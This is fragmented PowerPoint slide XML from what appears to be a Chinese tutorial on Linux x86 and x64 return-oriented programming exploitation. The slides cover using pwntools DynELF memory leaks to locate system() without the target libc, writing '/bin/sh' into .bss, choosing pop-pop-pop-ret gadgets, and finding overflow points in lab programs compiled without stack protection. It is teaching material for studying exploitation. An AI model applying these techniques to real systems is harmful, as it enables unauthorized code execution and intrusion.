              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr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867" y="148597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0x03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防护。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>但是要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>事先得到目标机器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者具体的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本号才能计算出相应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>offset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那么在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取不到目标机器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>情况下，应该如何做呢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memory leak(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内存泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来搜索内存找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39017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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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866" y="1485972"/>
            <a:ext cx="10983605" cy="503765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pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块来进行内存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dirty="0" smtClean="0"/>
              <a:t>01 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DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>模块需要实现一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数，针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序设计的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数如下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02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>d = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(leak, elf=ELF('./level2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块进行初始化了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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>system_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>d.lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('system', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址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6" y="2811535"/>
            <a:ext cx="10246710" cy="13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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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866" y="1485972"/>
            <a:ext cx="10983605" cy="503765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pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块来进行内存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 lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块只能获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，无法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取字符串“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在内存中的地址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所以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中需要调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将“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这字符串写入到程序的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段中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段是用来保存全局变量的值的，地址固定，并且可以读可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是从通过标准输入传进去的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readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -S level2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段的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30" y="4309884"/>
            <a:ext cx="7447619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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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866" y="1485972"/>
            <a:ext cx="10983605" cy="50376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寻找必要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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因为在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后要接着调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个函数的参数有三个，所以我们需要一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用来保证栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>平衡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同时也需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来将函数 返回地址跳转到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–d level2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以寻找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pop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pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ret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gadget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18" y="3391333"/>
            <a:ext cx="6066667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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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866" y="1485972"/>
            <a:ext cx="10983605" cy="50376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攻击过程：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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()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/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将“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写入到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段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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（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），执行“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1356851"/>
            <a:ext cx="81819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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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866" y="1485972"/>
            <a:ext cx="10983605" cy="50376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测试结果：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3" y="1913484"/>
            <a:ext cx="10076190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1717" y="2784142"/>
            <a:ext cx="7336809" cy="1454838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（二）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>ROP Linux_x64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987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1717" y="2784142"/>
            <a:ext cx="7336809" cy="1454838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（一）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>ROP Linux_x86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851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0x00 linux_64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>linux_86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/>
              <a:t>有两点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是内存地址的范围由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位。但是可以使用的内存地址不能大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x00007fffffffffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则会抛出异常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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是函数参数的传递方式发生了改变，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中参数都是保存在栈上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的前六个参数依次保存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDI, RSI, RDX, RCX, R8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R9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，如果还有更多的参数的话才会保存在栈上</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10240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0x01 linux_64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示例程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level3.c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85" y="2280355"/>
            <a:ext cx="4895238" cy="29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2693" y="1955167"/>
            <a:ext cx="8033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yun@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:~/ROP_linux_x64$ cat /proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>randomize_va_space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已开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector level3.c -o level3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5595217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通过分析源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>看到想要获取这个程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非常简单，只需要控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指针跳转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>callsystem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这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数的地址上即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序本身在内存中的地址不是随机的，所以不用担心函数地址发生改变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接下来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是要找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>溢出点。首先还是生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一串定位字符串：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25409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0x01 linux_64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示例程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level3.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找溢出点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gdb-peda</a:t>
            </a:r>
            <a:r>
